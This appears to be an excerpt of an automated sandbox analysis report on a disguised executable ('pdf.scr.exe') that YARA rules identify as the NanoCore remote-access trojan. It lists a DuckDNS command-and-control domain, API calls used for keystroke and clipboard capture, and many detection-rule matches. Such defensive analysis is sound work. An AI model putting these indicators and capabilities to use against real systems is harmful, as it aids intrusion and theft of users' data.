      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,2_2_0038D7A1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_0037A54A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0038F45C
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_003A9ED5

      E-Banking Fraud

      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

      Operating System Destruction

      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00

      System Summary

      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
